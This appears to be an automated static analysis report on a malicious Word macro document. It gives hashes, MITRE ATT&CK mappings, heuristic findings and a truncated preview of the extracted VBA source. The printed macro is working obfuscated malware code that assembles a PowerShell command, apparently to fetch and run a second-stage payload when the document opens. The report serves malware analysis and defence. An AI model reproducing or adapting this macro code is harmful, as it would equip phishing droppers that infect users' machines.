Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7370204a50db25f0…

MALICIOUS

Office (OLE)

Size: 140.5 KB
Created: 2018-05-21 21:22:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 2502b23cc68e2ac68ee06de24bc074c7
SHA-1: f7254d6a1210a02c6bc3c9916e45cfb3594b4ed7
SHA-256: 7370204a50db25f07f4802e6eab600a957368159f189dfa2409d3af87567c513
Risk score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office (OLE) document containing VBA macros. A critical-severity heuristic fired on a Shell() call in the VBA code. The extracted VBA script assembles a PowerShell command from obfuscated string fragments and attempts to execute it, most likely to download and run a second-stage payload. The AutoOpen macro marker further indicates that the code is intended to run automatically when the document is opened.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call found in the VBA code.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro marker present.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 151287 bytes
SHA-256: fc092062c2a1524ac1832f507418614c353cc1ac567b58cf9b1d976ff6e69004

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "nkmURXXZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CnpSzAKtzW()

On Error Resume Next
wiXmQIXtTwG = (RGjPIvjwNM - CLng(271724) + RfjCZD + Fix(ALwaJt / CDbl(495505 * Sqr(GzQHCYpQjqf))) - 583503 / Sin(jjOwEi - PGHkFzqIw + rqwmVCwSrKo - 928918 + CDbl(rqwmVCwSrKo)) * 847456 * Fix(271724))
XVoriIK = "p8r*'fFO5Bx1HNeT6P35Yi8Lo3CJDCANrBbZPrNQyFex7ZXREqoJyYP6zs8TSvAowershell  & ((GEt-varIabLe '*uMd4lwXQRg)nZHL"
crJwwHbFj = Left(Right(XVoriIK, 45), 30) + Left(Right(XVoriIK, 14), 2) + Left(Right(XVoriIK, 106), 3) + CStr(Left(Right(XVoriIK, 5), 1))

jQXzS = "M8P'TASJ5KStK9BEjWB2rWm.NaME[3,11,2]-joIN'')((('SABzBMBpLRHBcabTmHU8Qm2k682a((mumIPXPYz"
jiiMul = Left(Right(jQXzS, 64), 25) + Left(Right(jQXzS, 11), 3) + CStr(Left(Right(jQXzS, 84), 1))

WTvdJLrZ = Chr(43)
cBEBwQqUvw = "VMP2M8PB'klHWJnsa9BEjWB2rWmxtH"
mPjwOTZ = CStr(Left(Right(cBEBwQqUvw, 22), 9)) + CStr(Left(Right(cBEBwQqUvw, 4), 1))

QHCniXMZls = "dklVMP"
wwsVhkuu = Left(Right(QHCniXMZls, 5), 2)

FzcZYBGlS = Chr(43)
VIbQhZsXXk = "VMP2MmkldmkJ5KStK9lEj"
aDTfRZ = CStr(Left(Right(VIbQhZsXXk, 16), 6)) + Left(Right(VIbQhZsXXk, 3), 1)
wqNOcLvLwXf = (avBOjXA - CLng(433273) + lYTKD + Fix(hdYaUu / CDbl(681836 * Sqr(YcpHwtXD))) - 985192 / Sin(FiihS - oURLXA + YXCLO - 261128 + CDbl(YXCLO)) * 88784 * Fix(433273))
sPOXFmvKoT = Chr(43)
IqUGfUvkC = "VMP2M8PmklasdmktK9BEjWB2lWm"
uJAHdiA = CStr(Left(Right(IqUGfUvkC, 20), 8)) + CStr(Left(Right(IqUGfUvkC, 3), 1))

PvodzhnYQq = Chr(43)
vhdsZGbCj = "VMP2M8Pmkl = mktK9BEjWB2lWm"
fOzfmMUnXw = CStr(Left(Right(vhdsZGbCj, 20), 8)) + CStr(Left(Right(vhdsZGbCj, 3), 1))

UQBLCwm = Chr(43)
jqpamW = "VMP2M8PBTASJmkl&(ys8nys8mWmxtHYsibYBPBjklyQ30"
nPlfWvD = Left(Right(jqpamW, 33), 13) + CStr(Left(Right(jqpamW, 6), 2))

RqSOfUBoHw = Chr(43)
PfhXioDFu = "dPmklP2M8"
OvIqctAbY = Left(Right(PfhXioDFu, 7), 3)
ONEFUYUiYIl = (TiKjLidf - CLng(771622) + ivYWtiV + Fix(tXLQb / CDbl(713982 * Sqr(OhYTMf))) - 8970 / Sin(wkzEQFPX - aEEhkSfjbu + ZfkZGsUwwmL - 50396 + CDbl(ZfkZGsUwwmL)) * 446366 * Fix(771622))
zUiImhTPf = Chr(43)
WowZjjEjSQw = "VMP2ys8mkASJ5KSlK9"
wYzPiZiHHN = Left(Right(WowZjjEjSQw, 14), 5) + Left(Right(WowZjjEjSQw, 3), 1)

SFbaVkECW = Chr(43)
kvKdRFhZiT = "dPmk'P2M8"
DhPjmwHSQVb = Left(Right(kvKdRFhZiT, 7), 3)

WDBbnDOpqpD = Chr(43)
NJzEW = "VMP2'leysASJ5KS8K9"
fPGhQzPMIrs = Left(Right(NJzEW, 14), 5) + Left(Right(NJzEW, 3), 1)

jjsaXorrGY = Chr(43)
kiKKrGK = (SBwLoGjiJW - CLng(895373) + OYbji + Fix(OdVizn / CDbl(936583 * Sqr(lroENNCp))) - 19390 / Sin(APGQRfwqJP - SrrJujzdd + EUOaazSbVv - 773393 + CDbl(EUOaazSbVv)) * 642479 * Fix(895373))
kmXZhQJqi = "dy'VMP"
inipAOTQ = Left(Right(kmXZhQJqi, 5), 2)

VAVkYzFVkY = Chr(43)
STzqnjiZoo = "VMP2's8mkASJ5KSlK9"
YDbSfZdr = Left(Right(STzqnjiZoo, 14), 5) + Left(Right(STzqnjiZoo, 3), 1)

dhWJz = Chr(43)
sVqXSaFc = "VMP2M8Pmklw-omktK9BEjWB2lWm"
kbaFKHzcM = CStr(Left(Right(sVqXSaFc, 20), 8)) + CStr(Left(Right(sVqXSaFc, 3), 1))

pXcFnucw = Chr(43)
OzEMVcM = "VMP2MmklbmkJ5KStK9lEj"
AaLMKb = CStr(Left(Right(OzEMVcM, 16), 6)) + Left(Right(OzEMVcM, 3), 1)

bLIndMkrM = Chr(43)
CnpSzAKtzW = crJwwHbFj + jiiMul + WTvdJLrZ + mPjwOTZ + wwsVhkuu + FzcZYBGlS + aDTfRZ + sPOXFmvKoT + uJAHdiA + PvodzhnYQq + fOzfmMUnXw + UQBLCwm + nPlfWvD + RqSOfUBoHw + OvIqctAbY + zUiImhTPf + wYzPiZiHHN + SFbaVkECW + DhPjmwHSQVb + WDBbnDOpqpD + fPGhQzPMIrs + jjsaXorrGY + inipAOTQ + VAVkYzFVkY + YDbSfZdr + dhWJz + kbaFKHzcM + pXcFnucw + AaLMKb + bLIndMkrM

End Function

Function uiNRYaOop()

On Error Resume Next
mltJzziu = (AwXUZjqu - CLng(671998) + iDOllnPi + Fix(olkGp / CDbl(105301 * Sqr(MQPsHiIsDX))) - 511850 / Sin(cqwEp - uuqwOAzFtV + uIrtGiHJUzm - 956155 + CDbl(uIrtGiHJUzm)) * 988142 * Fix(671998))
zjsBnE = "VMP2M8PBmkljecymk9BEjWB2rWlxtH"
jZwOz = CStr(Left(Right(zjsBnE, 22), 9)) + CStr(Left(Right(zjsBnE, 4), 1))

XzjijG = Chr(43)
QawM
... (truncated)